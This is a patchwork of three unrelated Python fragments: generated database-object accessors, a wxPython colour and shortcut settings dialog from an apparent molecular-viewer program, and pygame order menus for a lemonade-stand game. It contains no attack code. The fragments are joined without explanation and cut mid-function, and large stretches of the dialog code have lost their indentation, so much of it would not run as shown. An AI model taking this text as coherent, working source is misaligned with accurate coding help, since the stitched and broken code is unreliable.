        for obj in old_obj.db_deleted_loop_execs:
            n_obj = DBLoopExec.update_version(obj, trans_dict)
            new_obj.db_deleted_loop_execs.append(n_obj)
    # Preserve the dirty/new bookkeeping flags of the source object.
    new_obj.is_new = old_obj.is_new
    new_obj.is_dirty = old_obj.is_dirty
    return new_obj
def db_children(self, parent=(None,None), orphan=False):
    """Return a flat list of (object, parent_type, parent_id) tuples for
    this object and all of its children.

    When `orphan` is true the children are detached from this object after
    being collected.
    """
    children = []
    to_del = []
    for child in self.db_annotations:
        children.extend(child.db_children((self.vtType, self.db_id), orphan))
        if orphan:
            to_del.append(child)
    for child in to_del:
        self.db_delete_annotation(child)
    to_del = []
    for child in self.db_loop_execs:
        children.extend(child.db_children((self.vtType, self.db_id), orphan))
        if orphan:
            to_del.append(child)
    for child in to_del:
        self.db_delete_loop_exec(child)
    # This object itself is reported last, tagged with its own parent.
    children.append((self, parent[0], parent[1]))
    return children

def db_deleted_children(self, remove=False):
    """Return all deleted children, optionally clearing the deletion lists."""
    children = []
    children.extend(self.db_deleted_annotations)
    children.extend(self.db_deleted_loop_execs)
    if remove:
        self.db_deleted_annotations = []
        self.db_deleted_loop_execs = []
    return children

def has_changes(self):
    """Return True if this object or any of its children is dirty."""
    if self.is_dirty:
        return True
    for child in self._db_annotations:
        if child.has_changes():
            return True
    for child in self._db_loop_execs:
        if child.has_changes():
            return True
    return False
# --- Generated scalar-field accessors. Each field gets: a dirty-tracking
# property, plus db_add_/db_change_ (plain assignment, no dirty flag) and
# db_delete_ (sets the field to None, ignoring its argument) helpers. ---
def __get_db_id(self):
    return self._db_id

def __set_db_id(self, id):
    self._db_id = id
    self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)

def db_add_id(self, id):
    self._db_id = id

def db_change_id(self, id):
    self._db_id = id

def db_delete_id(self, id):
    self._db_id = None

def __get_db_ts_start(self):
    return self._db_ts_start

def __set_db_ts_start(self, ts_start):
    self._db_ts_start = ts_start
    self.is_dirty = True
db_ts_start = property(__get_db_ts_start, __set_db_ts_start)

def db_add_ts_start(self, ts_start):
    self._db_ts_start = ts_start

def db_change_ts_start(self, ts_start):
    self._db_ts_start = ts_start

def db_delete_ts_start(self, ts_start):
    self._db_ts_start = None

def __get_db_ts_end(self):
    return self._db_ts_end

def __set_db_ts_end(self, ts_end):
    self._db_ts_end = ts_end
    self.is_dirty = True
db_ts_end = property(__get_db_ts_end, __set_db_ts_end)

def db_add_ts_end(self, ts_end):
    self._db_ts_end = ts_end

def db_change_ts_end(self, ts_end):
    self._db_ts_end = ts_end

def db_delete_ts_end(self, ts_end):
    self._db_ts_end = None

def __get_db_cached(self):
    return self._db_cached

def __set_db_cached(self, cached):
    self._db_cached = cached
    self.is_dirty = True
db_cached = property(__get_db_cached, __set_db_cached)

def db_add_cached(self, cached):
    self._db_cached = cached

def db_change_cached(self, cached):
    self._db_cached = cached

def db_delete_cached(self, cached):
    self._db_cached = None

def __get_db_module_id(self):
    return self._db_module_id

def __set_db_module_id(self, module_id):
    self._db_module_id = module_id
    self.is_dirty = True
db_module_id = property(__get_db_module_id, __set_db_module_id)

def db_add_module_id(self, module_id):
    self._db_module_id = module_id

def db_change_module_id(self, module_id):
    self._db_module_id = module_id

def db_delete_module_id(self, module_id):
    self._db_module_id = None

def __get_db_module_name(self):
    return self._db_module_name

def __set_db_module_name(self, module_name):
    self._db_module_name = module_name
    self.is_dirty = True
db_module_name = property(__get_db_module_name, __set_db_module_name)

def db_add_module_name(self, module_name):
    self._db_module_name = module_name

def db_change_module_name(self, module_name):
    self._db_module_name = module_name

def db_delete_module_name(self, module_name):
    self._db_module_name = None

def __get_db_completed(self):
    return self._db_completed

def __set_db_completed(self, completed):
    self._db_completed = completed
    self.is_dirty = True
db_completed = property(__get_db_completed, __set_db_completed)

def db_add_completed(self, completed):
    self._db_completed = completed
def db_change_completed(self, completed):
| |
#self.elmcolorobjdic,'dic-color'],
'aa-residue-color':['Method',self.parent.GetButtonColors,self.colorpanelobjdic['residue'][1],'dic-color'],
#self.rescolorobjdic,'dic-color'],
'aa-chain-color':['Method',self.parent.GetButtonColors,self.colorpanelobjdic['chain'][1],'dic-color']
#self.chaincolorobjdic,'dic-color']
}
return paramobj
def GetParamsFromWidgets(self):
    """Collect the current value of every parameter widget into self.newparamdic."""
    self.newparamdic={}
    for prmnam, widget in self.paramwidgetdic.iteritems():
        # widget is [kind, wx control or bound method, ...]; dispatch on kind.
        if widget[0] == 'TextCtrl': self.newparamdic[prmnam]=widget[1].GetValue()
        elif widget[0] == 'ComboBox': self.newparamdic[prmnam]=widget[1].GetValue()
        elif widget[0] == 'Button':
            wxcolor=widget[1].GetBackgroundColour() # wx.Colour object
            self.newparamdic[prmnam]=wxcolor.Get() # convert to RGB [0-255]
        elif widget[0] == 'Method': self.newparamdic[prmnam]=widget[1](widget[2])
        else: print 'Error: widget in GetParamsFromWidget. param name=',prmnam
def SetParamsToWidgets(self,paramsdic):
""" note: color intensitiy of r,g, and b, ranges from 0 to 255! """
for prmnam, value in paramsdic.iteritems():
if not self.paramwidgetdic.has_key(prmnam): continue
widget=self.paramwidgetdic[prmnam]
if widget[0] == 'TextCtrl': widget[1].SetValue(str(value))
elif widget[0] == 'ComboBox': widget[1].SetValue(str(value))
elif widget[0] == 'Button': widget[1].SetBackgroundColour(value[:3]) # wx.Colour object
elif widget[0] == 'Method':
if prmnam == 'element-color':
colordic=paramsdic['element-color']
colorobjdic=self.colorpanelobjdic['element'][1]
self.parent.SetColorOnButtons(colorobjdic,colordic)
elif prmnam == 'aa-residue-color':
colordic=paramsdic['aa-residue-color']
colorobjdic=self.colorpanelobjdic['residue'][1]
self.parent.SetColorOnButtons(colorobjdic,colordic)
elif prmnam == 'aa-chain-color':
colordic=paramsdic['aa-chain-color']
colorobjdic=self.colorpanelobjdic['chain'][1]
self.parent.SetColorOnButtons(colorobjdic,colordic)
else: print 'Error: widget in SetParamsToWidget. param name=',parnam
def CountModifiedParams(self):
    """Return the number of current parameters whose new value differs.

    Compares self.currentparams against self.newparamdic and counts the
    keys present in both whose values are unequal.
    """
    nmody=0
    # `for k in dict` / `k in dict` work identically on Python 2 and 3
    # (iteritems/has_key were removed in Python 3).
    for prmnam in self.currentparams:
        if prmnam in self.newparamdic:
            if self.currentparams[prmnam] != self.newparamdic[prmnam]: nmody += 1
    # BUG FIX: the original ended with `return mnody`, an undefined name
    # (typo for `nmody`), so every call raised NameError.
    return nmody
def LoadDefaultElmColor(self):
    """Return the default element color table scaled to 0-255 RGB. (not used)"""
    colordic=ctrl.SettingCtrl.DefaultElementColor()
    for item,color in colordic.iteritems():
        # Scale 0-1 floats to 0-255 and drop the alpha component.
        color=numpy.array(color); color=255*color; color=color[:3]
        colordic[item]=color
    return colordic

def LoadDefaultResColor(self):
    """Return the default residue color table scaled to 0-255 RGB. (not used)"""
    colordic=ctrl.SettingCtrl.DefaultAAResidueColor()
    for item,color in colordic.iteritems():
        # Scale 0-1 floats to 0-255 and drop the alpha component.
        color=numpy.array(color); color=255*color; color=color[:3]
        colordic[item]=color
    return colordic
def LoadDefaultChainColor(self):
    """Return the default chain color table scaled to 0-255 RGB. (not used)"""
    # BUG FIX: the original had `DefaultAAChainColor()()` -- a stray second
    # call operator that would raise TypeError (the sibling loaders call once).
    colordic=ctrl.SettingCtrl.DefaultAAChainColor()
    for item,color in colordic.iteritems():
        # Scale 0-1 floats to 0-255 and drop the alpha component.
        color=numpy.array(color); color=255*color; color=color[:3]
        colordic[item]=color
    return colordic
def LoadDefault(self):
    """Reset the dialog to the default parameter set and clear the file box."""
    self.parent.Message('')
    self.paramsdic=copy.deepcopy(self.defaultparamsdic)
    self.cmbfil.SetValue('')
    self.SetParamsToWidgets(self.paramsdic)

def GetDefaultModelParams(self):
    """Build the default parameter dict from the settings controller."""
    defaultdic={}
    for prmnam,type in self.paramtypedic.iteritems():
        defaultdic[prmnam]=self.setctrl.GetDefaultParam(prmnam)
        if defaultdic[prmnam] == None: print 'Not found prmnam=',prmnam
    # Convert stored values (e.g. 0-1 colors) into widget-friendly form.
    defaultdic=self.parent.ConvertParamsForCustomize(defaultdic,self.paramtypedic)
    return defaultdic
def OnAddDelButton(self,event):
    """Keep each add/del toggle-button pair mutually exclusive.

    Buttons in self.adddelbtnlst alternate add (even index) / del (odd
    index); toggling one forces its partner to the opposite state.
    """
    self.parent.Message('')
    obj=event.GetEventObject()
    btnnmb=self.adddelbtnlst.index(obj)
    modnmb=btnnmb % 2  # 0 = "add" button, 1 = "del" button
    stat=obj.GetValue()
    notstat=not stat
    if modnmb == 0 and stat: self.adddelbtnlst[btnnmb+1].SetValue(notstat)
    if modnmb == 0 and notstat: self.adddelbtnlst[btnnmb+1].SetValue(stat)
    if modnmb == 1 and stat: self.adddelbtnlst[btnnmb-1].SetValue(notstat)
    if modnmb == 1 and notstat: self.adddelbtnlst[btnnmb-1].SetValue(stat)
def OnInputItem(self,event):
    """Handle text entered in an element/residue/chain input box: add or
    delete the item and rebuild the corresponding color-button panel."""
    self.parent.Message('')
    itemnmbdic={0:0,2:1,4:2}; itemnamlst=['element','residue','chain']
    # BUG FIX: the chain entry was 'aa-chain-colr' (typo); it must match the
    # 'aa-chain-color' key used everywhere else in this class.
    paramnamdic={'element':'element-color','residue':'aa-residue-color','chain':'aa-chain-color'}
    #
    ID=event.GetId()
    self.parent.Message('')
    #
    input=self.inputtcldic[ID][1].GetValue()
    if input == '': return
    #
    nmb=self.inputtcldic[ID][0] # nmb:0 'element', 2:'residue', 4: 'chain'
    itemnmb=itemnmbdic[nmb] # item number: 0 'element', 1:'residue', 2:'chain'
    item=itemnamlst[itemnmb]
    # scroll position
    [x,y]=self.colorpanelobjdic[item][0].GetViewStart()
    oldcolorobjdic=self.colorpanelobjdic[item][1]
    # normalize the input: elements/residues upper-cased and padded,
    # chains must be integers
    if item == 'element':
        input=input.upper(); input=input.rjust(2,' ')
    elif item == 'residue':
        input=input.upper(); input=input.ljust(3,' ')
    else:
        if not input.isdigit():
            self.parent.Message('Wrong input data. "'+input+'". Integers only')
            return
        else: input=int(input)
    # add/del
    addbtn=self.adddelbtnlst[nmb]
    add=addbtn.GetValue()
    # add or del input element in item
    namlst,colordic=self.AddDelParamItem(add,item,input)
    if len(namlst) <= 0:
        self.inputtcldic[ID][1].SetValue('')
        return
    # destroy item color panel
    self.DestroyColorButtonsOnPanel(oldcolorobjdic)
    # re-create item color panel
    pan=self.colorpanelobjdic[item][0]
    colorobjdic=self.CreateColorButtonsOnPanel(pan,item,namlst,colordic)
    self.colorpanelobjdic[item]=[pan,colorobjdic]
    # reset widgetdic (keep the trailing 'dic-color' tag so the entry has
    # the same shape as the ones built in the paramobj table)
    prmnam=paramnamdic[item]
    self.paramwidgetdic[prmnam]=['Method',self.parent.GetButtonColors,colorobjdic,'dic-color']
    # set scrolled position so the newly added item is visible
    if add:
        idx=namlst.index(input)
        x=0; y=(idx-1)*20
        self.colorpanelobjdic[item][0].Scroll(x,y)
    # clear input text control
    self.inputtcldic[ID][1].SetValue('')
    self.saved=False
def AddDelParamItem(self,add,item,input):
    """Add (`add` true) or delete `input` in the color table for `item`.

    Returns (sorted name list, color dict) for rebuilding the panel, or
    ([], {}) when the request is rejected.
    """
    # itemnmb: 0 'element', 1:'residue', 2: 'chain'
    # get scroll position
    [x,y]=self.colorpanelobjdic[item][0].GetViewStart()
    # check duplicate
    colorobjdic=self.colorpanelobjdic[item][1]
    # NOTE: str(input) -- for chains `input` is an int and the original
    # string concatenation raised TypeError when building the message.
    if add and colorobjdic.has_key(input):
        self.parent.Message('item "'+str(input)+'" already exists.')
        return [],{}
    if not add and not colorobjdic.has_key(input):
        self.parent.Message('item "'+str(input)+'" does not exist.')
        return [],{}
    #
    defcolor=[0,0,0] # black
    if item == 'element':
        if add: self.elmcolordic[input]=defcolor
        else:
            if input == 'XX' or input == '??':
                self.parent.Message('Do not delete "'+input+'".')
                # BUG FIX: the original bare `return` yielded None, which
                # the caller unpacks into two values -> TypeError.
                return [],{}
            del self.elmcolordic[input]
        self.paramsdic['element-color']=self.elmcolordic
        #self.paramsdic=self.parent.ConvertParamsForCustomize(self.paramsdic,self.paramtypedic)
        self.elmnamlst=self.elmcolordic.keys()
        namlst=self.elmnamlst
        namlst.sort()
        colordic=self.elmcolordic
    elif item == 'residue':
        if add: self.rescolordic[input]=defcolor
        else:
            if input == '???':
                self.parent.Message('Do not delete "'+input+'".')
                # BUG FIX: same bare-return problem as above.
                return [],{}
            del self.rescolordic[input]
        self.paramsdic['aa-residue-color']=self.rescolordic
        self.resnamlst=self.rescolordic.keys()
        namlst=self.resnamlst
        namlst.sort()
        colordic=self.rescolordic
    elif item == 'chain':
        if add: self.chaincolordic[input]=defcolor
        else: del self.chaincolordic[input]
        self.paramsdic['aa-chain-color']=self.chaincolordic
        self.chainnamlst=self.chaincolordic.keys()
        namlst=self.chainnamlst
        namlst.sort()
        colordic=self.chaincolordic
    # NOTE(review): `itemcolordic` is not defined anywhere in view and is
    # written even on delete -- looks vestigial; confirm before removing.
    self.itemcolordic[input]=[255,0,0]
    return namlst,colordic
def OnButtonColor(self,event):
self.saveas=False
self.parent.Message('')
obj=event.GetEventObject()
color=lib.ChooseColorOnPalette(self.parent,True,-1)
if color != None:
obj.SetBackgroundColour(color)
obj.Refresh()
 def OnFile(self,event):
  """ Load the parameter set selected in the file combo box.

  Reads '<name>.model', merges it over a deep copy of the defaults,
  rebuilds the three color-button panels (element/residue/chain) and
  refreshes all widgets. Invoked programmatically with a dummy event (1).
  """
  self.parent.Message('')
  self.saveas=False
  # warn before discarding unsaved edits
  if not self.saved:
   mess='Current parameter set is not saved. Are you sure to move?.'
   dlg=lib.MessageBoxYesNo(mess,"")
   if not dlg:
    # user declined: restore the previous selection and bail out
    self.cmbfil.SetValue(self.curset)
    return
  #
  curset=self.cmbfil.GetValue()
  filename=curset
  if len(filename) <= 0: return
  filename=self.parent.MakeFullPathName(filename,'.model')
  ans=self.parent.IsFileExists(filename)
  if not ans: return
  # load params from the .model file
  paramsdic=ctrl.SettingCtrl.ReadParamSetFile(filename,self.paramtypedic)
  # convert color 4 to 3 components
  paramsdic=self.parent.ConvertParamsForCustomize(paramsdic,self.paramtypedic)
  # overlay the loaded values on a deep copy of the defaults
  self.paramsdic=copy.deepcopy(self.defaultparamsdic)
  self.paramsdic.update(paramsdic)
  # rebuild the per-category color dictionaries and name lists
  self.elmcolordic=self.paramsdic['element-color']
  self.elmnamlst=self.elmcolordic.keys()
  self.rescolordic=self.paramsdic['aa-residue-color']
  self.resnamlst=self.rescolordic.keys()
  self.chaincolordic=self.paramsdic['aa-chain-color']
  self.chainnamlst=self.chaincolordic.keys()
  # clear pending per-item color markers
  self.itemcolordic={}
  #try:
  # destroy the old color buttons before re-creating them
  for item in ['element','residue','chain']:
   self.DestroyColorButtonsOnPanel(self.colorpanelobjdic[item][1])
  # re-create each item color panel
  pan=self.colorpanelobjdic['element'][0]
  colorobjdic=self.CreateColorButtonsOnPanel(pan,'element',self.elmnamlst,self.elmcolordic)
  self.colorpanelobjdic['element']=[pan,colorobjdic]
  pan=self.colorpanelobjdic['residue'][0]
  colorobjdic=self.CreateColorButtonsOnPanel(pan,'residue',self.resnamlst,self.rescolordic)
  self.colorpanelobjdic['residue']=[pan,colorobjdic]
  pan=self.colorpanelobjdic['chain'][0]
  colorobjdic=self.CreateColorButtonsOnPanel(pan,'chain',self.chainnamlst,self.chaincolordic)
  self.colorpanelobjdic['chain']=[pan,colorobjdic]
  #except: pass
  # make type and widget object dictionary
  paramobj=self.ParamObjDefinition()
  self.paramwidgetdic=self.parent.MakeParamWidgetDic(paramobj)
  # push loaded values (colors etc.) onto the widgets
  self.SetParamsToWidgets(self.paramsdic)
  # record the newly current set on the parent
  self.curset=curset
  self.parent.SetCurrentParamSet(self.panelnam,self.curset)
def ResetCurrentSet(self,curset):
self.curset=curset
self.cmbfil.SetStringSelection(self.curset)
self.OnFile(1)
def OnNewFile(self,event):
self.parent.Message('')
if not self.saveas and not self.rename: return
setnam=self.cmbfil.GetValue()
if len(setnam) <= 0:
self.parent.Message('No file name ')
return
try: idx=self.filelst.index(setnam)
except: idx=-1
if idx >= 0:
mess='the name is duplicate. please input a different name'
lib.MessageBoxOK(mess,"")
return
if self.rename:
retcode=self.Rename(self.curset,setnam)
self.cmbfil.SetValue(self.curset)
if self.saveas:
self.SaveFile()
#
self.curset=setnam
self.filelst.append(self.curset)
self.cmbfil.SetItems(self.filelst)
self.cmbfil.SetValue(self.curset)
self.parent.Message('Created new parameter set '+'"'+setnam+'"')
# update 'Model' current and filelst
self.parent.SetCurrentParamSet(self.panelnam,self.curset)
self.parent.paramsetfiledic[self.panelnam]=self.filelst
self.saveas=False
#
self.saveas=False
self.rename=False
def Rename(self,oldnam,newnam):
customdir=self.setctrl.GetDir('Customize')
oldfile=os.path.join(customdir,oldnam+'.model')
newfile=oldfile.replace(oldnam,newnam)
if os.path.exists(newfile):
mess='the file "'+newfile+' " already exists. try a diferent name.'
self.parant.Message(mess)
return False
# remame project file name
try: os.rename(oldfile,newfile)
except:
mess='Failed rename "'+oldnam+'" to "'+newnam+'"'
return False
idx=self.filelst.index(oldnam)
if idx >= 0: self.filelst[idx]=newnam
else:
self.parent.Message('Error occured in renaming '+'"'+oldnam+'" to "'+newnam+'"')
return False
self.curset=newnam
# set items to widget
self.cmbfil.SetItems(self.filelst)
self.cmbfil.SetValue(self.curset)
# update 'Project' current and filelst
self.parent.SetCurrentParamSet(self.panelnam,self.curset)
self.parent.paramsetfiledic[self.panelnam]=self.filelst
self.parent.Message('Renamed '+'"'+oldnam+'" to "'+newnam+'"')
return True
def OnViewFile(self,event):
self.parent.Message('')
self.parent.ViewSelectedFile(self.cmbfil,'.model') #,self.panelnam)
def IsSaved(self):
return self.saved
 def XXApply(self):
  """ Placeholder apply hook; intentionally does nothing. """
  pass
def Cancel(self):
self.saveas=False
mess='Model parameter assignment was canceled.'
self.parent.StatusMessage(mess)
self.saved=True
def DelFile(self):
self.saveas=False
self.parent.Message('')
self.parent.DelSelectedFile(self.cmbfil,'.model')
setnam=self.cmbfil.GetValue()
self.filelst.remove(setnam)
self.cmbfil.SetItems(self.filelst)
if len(self.filelst) > 0: self.curset=self.filelst[0]
else: self.curset=''
self.cmbfil.SetStringSelection(self.curset)
self.parent.SetCurrentParamSet(self.panelnam,self.curset)
self.parent.paramsetfiledic[self.panelnam]=self.filelst
self.parent.Message('param set file "'+setnam+'" was deleted')
def RenameFile(self):
self.rename=True
mess='Input name in "Model param set file" window and hit "Enter"'
lib.MessageBoxOK(mess,"")
self.cmbfil.SetValue('')
def SaveFile(self):
self.saveas=False
self.parent.Message('')
self.GetParamsFromWidgets()
filename=self.cmbfil.GetValue()
if len(filename) <= 0:
self.parent.Message('No file name in param set file window')
return
#
filename=self.parent.MakeFullPathName(filename,'.model')
print 'filename in save',filename
text='model parameters'
Customize_Frm.WriteParamSetFile(filename,text,self.paramtypedic,self.newparamdic)
#
self.parent.Message('Saved "'+filename+'".')
self.saved=True
def SaveFileAs(self):
self.saveas=True
mess='Input param set name in "Add-on menu file" window and hit "Enter"'
lib.MessageBoxOK(mess,"")
self.cmbfil.SetValue('')
class CustomShortcut():
""" Shortcut setting panel called in 'Setting_Frm' class
:param obj parent: 'Setting_Frm'
:param obj pagepanel: parent notebook panel.
:param obj model: instance of 'Model' class
"""
 def __init__(self,parent,pagepanel,model):
  """ Build the shortcut-assignment panel and load the current key file. """
  self.classnam='SettingAddOn'
  self.panelnam='Shortcut'
  self.parent=parent
  self.pagepanel=pagepanel
  self.model=model #parent.model #self.parent.model
  self.winctrl=model.winctrl
  self.setctrl=model.setctrl
  self.menuctrl=model.menuctrl
  self.pagepanel.SetBackgroundColour('light gray')
  # edit-state flags: saved file state, pending save-as / rename modes
  self.saved=True
  self.saveas=False
  self.rename=False
  # index of the row selected in the list control (-1 = none)
  self.selectedcolumn=-1
  self.menuitem=''
  self.menuitemlst=[]
  # known shortcut definition files and the currently selected one
  self.filelst=self.parent.paramsetfiledic[self.panelnam]
  self.curset=self.parent.curparamsetdic[self.panelnam]
  # reserved shortcut keys that must not be reassigned
  self.reservedkeydic=ctrl.SettingCtrl.ReservedShortcutKey()
  # key -> [top menu, submenu label] assignments loaded from the file
  self.keyassigneddic={}
  # top-menu names and their submenu label/tip pairs
  self.menutoplst,self.menulabeldic=self.menuctrl.MakeMenuLabelDic()
  self.menulabeldic['All']=['','']
  if len(self.menutoplst) > 0: self.menuitem=self.menutoplst[0]
  else: self.menuitem=''
  # create panel
  self.CreatePanel()
  # read shortcut key file
  self.OnFile(1)
def CreatePanel(self):
size=self.parent.GetSize(); w=size[0]; h=size[1]
self.panel=self.pagepanel
hcb=const.HCBOX
yloc=10
# create file button
title='Shortcut definition file:'
sttip=wx.StaticText(self.panel,-1,title,pos=(10,yloc),size=(140,18))
sttip.SetToolTipString('Select shortcut definotion name(file,*.shortcut)')
self.cmbfil=wx.ComboBox(self.panel,wx.ID_ANY,"",pos=(150,yloc-2),size=(180,hcb))
self.cmbfil.Bind(wx.EVT_COMBOBOX,self.OnFile)
self.cmbfil.Bind(wx.EVT_TEXT_ENTER,self.OnNewFile)
self.cmbfil.SetItems(self.filelst)
self.cmbfil.SetStringSelection(self.curset) #self.curparamsetdic['Shortcut'])
btnview=wx.Button(self.panel,-1,"View",pos=(350,yloc-2),size=(40,20))
btnview.SetToolTipString('View/Edit the file with editor')
btnview.Bind(wx.EVT_BUTTON,self.OnViewFile)
#
yloc += 25
wx.StaticLine(self.panel,pos=(-1,yloc),size=(w,4),style=wx.LI_HORIZONTAL)
yloc += 10
wx.StaticText(self.panel,-1,"Select top menu:",pos=(10,yloc),size=(110,18))
self.cmbmenu=wx.ComboBox(self.panel,wx.ID_ANY,"",pos=(130,yloc-2),size=(120,hcb))
self.cmbmenu.Bind(wx.EVT_COMBOBOX,self.OnMenuItem)
self.cmbmenu.SetItems(self.menutoplst)
self.cmbmenu.SetValue(self.menuitem)
btncurset=wx.Button(self.panel,-1,"View all",pos=(270,yloc-2),size=(80,20))
btncurset.SetToolTipString('View settings in all top menus')
btncurset.Bind(wx.EVT_BUTTON,self.OnViewAll)
xsize=w-20 #self.sashposition
ysize=h-100
###if lib.GetPlatform() == 'WINDOWS': hpanlst=h-195
yloc=yloc+25; ybtn=150 # 25
xpanlst=xsize-10 #550
hpanlst=h-yloc-ybtn #170
self.lstctrl=wx.ListCtrl(self.panel,-1,pos=(10,yloc),size=(xpanlst,hpanlst), #250),
style=wx.LC_REPORT) #|wx.LC_EDIT_LABELS) # LC_SINGLE_SEL
self.lstctrl.Bind(wx.EVT_LIST_ITEM_SELECTED,self.OnSelected)
self.lstctrl.SetToolTipString('Select a line and push keyboard key ("space" key cancels)')
self.lstctrl.Bind(wx.EVT_LIST_KEY_DOWN,self.OnKeyDown)
self.lstctrl.InsertColumn(0,'#',width=40,format=wx.LIST_FORMAT_RIGHT)
self.lstctrl.InsertColumn(1,'key',width=45,format=wx.LIST_FORMAT_CENTER)
self.lstctrl.InsertColumn(2,'submenu label',width=200)
self.lstctrl.InsertColumn(3,'tip or top menu label',width=200)
# set string item
yloc=300
pos=[-1,yloc]
self.butnpan=CommonActionButtons(self.parent,self.pagepanel,self,pos)
def Initialize(self):
self.filelst=self.parent.paramsetfiledic[self.panelnam]
self.curset=self.parent.curparamsetdic[self.panelnam]
if self.curset == "":
self.cmbfil.SetValue(self.curset)
self.LoadDefault()
mess='No parameter set file. Default param set is loaded.'
self.parent.Message(mess)
else: self.cmbfil.SetStringSelection(self.curset)
#
if self.curset == '': self.LoadDefault()
else: self.OnFile(1)
#
self.saveas=False
self.saved=True
def SetStringData(self,menuitem):
if menuitem == '': return
# delete all items
self.lstctrl.DeleteAllItems()
#
self.selectcolumn=-1; i=0; nkey=0
indx=self.lstctrl.InsertStringItem(200,'')
for i in range(len(self.menulabeldic[menuitem])):
label=self.menulabeldic[menuitem][i][0]
tip=self.menulabeldic[menuitem][i][1]
keychar=''
for key, lst in self.keyassigneddic.iteritems():
if self.menuitem == 'All':
if lst[1] == label:
keychar=key; break
else:
if lst[0] == self.menuitem and lst[1] == label:
keychar=key; break
#if apply and key == '': continue
indx=self.lstctrl.InsertStringItem(200,str(i+1))
self.lstctrl.SetStringItem(indx,1,keychar)
self.lstctrl.SetStringItem(indx,2,label)
self.lstctrl.SetStringItem(indx,3,tip)
if keychar != '': nkey += 1
i += 1
def OnSelected(self,event):
self.saveas=False
self.selectedcolumn=self.lstctrl.GetFirstSelected()
self.parent.StatusMessage('')
def OnKeyDown(self,event):
self.saveas=False
if self.selectedcolumn <= 0: return
keycode=event.GetKeyCode()
if keycode == 32: keychar='' # space key
else: keychar=ctrl.MouseCtrl.UniCodeToChar(keycode) # the widget uses unicode(not ASCII)
#print 'keycode,keychar',keycode,keychar
if keycode != 32 and self.keyassigneddic.has_key(keychar):
mess='the key | |
index = 0
starting_x = 20
starting_y = 100
button_dimension = 25
buttons = [False] *2*len(possible_orders)
prices = []
for order in possible_orders:
item_name_x = starting_x
item_name_y = starting_y + index*50
lemon_price = round(pricing.get_lemon_discountedprice(timedelta(hours=order[1]), order[0]),2)
prices.append(lemon_price)
button_coords = [(item_name_x+600, item_name_y, button_dimension, button_dimension),
(item_name_x+640, item_name_y, button_dimension, button_dimension),
(item_name_x+680, item_name_y, button_dimension, button_dimension)]
draw_text(str(order[0]), font, (255, 255, 255), screen , item_name_x, item_name_y)
draw_text(str(order[1])+' HR', font, (255, 255, 255), screen , item_name_x+200, item_name_y)
draw_text(str(lemon_price), font, (255, 255, 255), screen , item_name_x+400, item_name_y)
buttons[index*2] = button(screen, '-', (0,0,0,100), (0,0,0,255), button_coords[0], font, click)
button(screen, str(order_amounts[index]), (0,0,0,0), (0,0,0,0), button_coords[1], font, click)
buttons[index*2+1] = button(screen, '+', (0,0,0,100), (0,0,0,255), button_coords[2], font, click)
index += 1
place_order = button(screen, 'Place Order', (0,0,0,100), (0,0,0,255), (50,500,300,50), font, click)
return_to_inventory = button(screen, 'Back', (0,0,0,100), (0,0,0,255), (400,500,300,50), font, click)
if click:
for i in range(len(buttons)):
if buttons[i]:
if i % 2 != 0:
if order_amounts[int(i/2)] == amounts_max:
pass
else:
order_amounts[int(i/2)] +=1
else:
if order_amounts[int((i+1)/2)] == amounts_min:
pass
else:
order_amounts[int((i+1)/2)] -=1
if place_order:
#Calculate cost
total_cost = 0
for i in range(len(order_amounts)):
total_cost += order_amounts[i]*prices[i]
print(total_cost)
#Check for enough cash
if total_cost <= lemonade_stand.account_balance:
order_message = 'Order Placed'
#Do the orders
index = 0
for order in possible_orders:
if order_amounts[index] != 0:
order_num = 0
while order_num < order_amounts[index]:
lemon_order = Order(order_dt=lemonade_game.current_datetime, delivery_dt=lemonade_game.current_datetime+timedelta(hours=order[1]), amount=order[0])
lemonade_stand.lemonstock.add_order(lemon_order)
order_num += 1
index += 1
#Pay
lemonade_stand.account_balance -= total_cost
else:
order_message = 'Order too expensive'
if return_to_inventory:
done = True
click = False
screen.blit(font.render(order_message, 1, (0,0,0)), [10,380])
pygame.display.update()
#Events
for event in pygame.event.get():
# Close button clicked
if event.type == pygame.QUIT:
done = True
if event.type == pygame.MOUSEBUTTONDOWN:
#Clicked on start game
if event.button == 1:
click = True
if event.type == pygame.KEYDOWN:
# Escape key pressed
if event.key == pygame.K_ESCAPE:
done = True
def sugar_order_menu(lemonade_game):
    """Modal pygame screen for ordering sugar.

    Runs its own event loop until the player leaves (Back button, ESC or
    window close). On "Place Order" it queues Order objects on
    lemonade_stand.sugarstock and deducts the total cost from
    lemonade_stand.account_balance, provided the balance covers it.
    """
    screen = lemonade_game.screen
    background = create_menu_background(screen)
    order_sugar_image = pygame.image.load('./resources/background.png')
    order_message = ''
    #(amount, time(hrs))
    possible_orders = [(100,1),(250,2),(500,6),(1000,24)]
    # per-row quantities selected with the -/+ buttons
    order_amounts = [0] * len(possible_orders)
    lemonade_stand = lemonade_game.lemonade_stand
    done = False
    click = False
    while not done:
        screen.blit(background, (0,0))
        screen.blit(order_sugar_image, (0,0))
        font = pygame.font.Font(FONT_STYLE,15)
        draw_text('Order Sugar', font, (255, 255, 255), screen, 20, 20)
        draw_text('Quantity [g]', font, (255, 255, 255), screen, 20, 70)
        draw_text('Arrives In', font, (255, 255, 255), screen, 20+200, 70)
        draw_text('Price', font, (255, 255, 255), screen, 20+400, 70)
        draw_text('Order', font, (255, 255, 255), screen, 20+600, 70)
        #Implement menu to order from, times in hours
        amounts_min = 0
        amounts_max = 10
        index = 0
        starting_x = 20
        starting_y = 100
        button_dimension = 25
        # buttons holds the [-,+] pair per order row; rebuilt every frame
        buttons = [False] *2*len(possible_orders)
        prices = []
        for order in possible_orders:
            item_name_x = starting_x
            item_name_y = starting_y + index*50
            #Convert amount ordered to kg so pricing makes sense
            sugar_price = round(pricing.get_sugar_discountedprice(timedelta(hours=order[1]), order[0]/1000),2)
            prices.append(sugar_price)
            button_coords = [(item_name_x+600, item_name_y, button_dimension, button_dimension),
                             (item_name_x+640, item_name_y, button_dimension, button_dimension),
                             (item_name_x+680, item_name_y, button_dimension, button_dimension)]
            draw_text(str(order[0]), font, (255, 255, 255), screen , item_name_x, item_name_y)
            draw_text(str(order[1])+' HR', font, (255, 255, 255), screen , item_name_x+200, item_name_y)
            draw_text(str(sugar_price), font, (255, 255, 255), screen , item_name_x+400, item_name_y)
            buttons[index*2] = button(screen, '-', (0,0,0,100), (0,0,0,255), button_coords[0], font, click)
            # middle "button" only displays the current quantity
            button(screen, str(order_amounts[index]), (0,0,0,0), (0,0,0,0), button_coords[1], font, click)
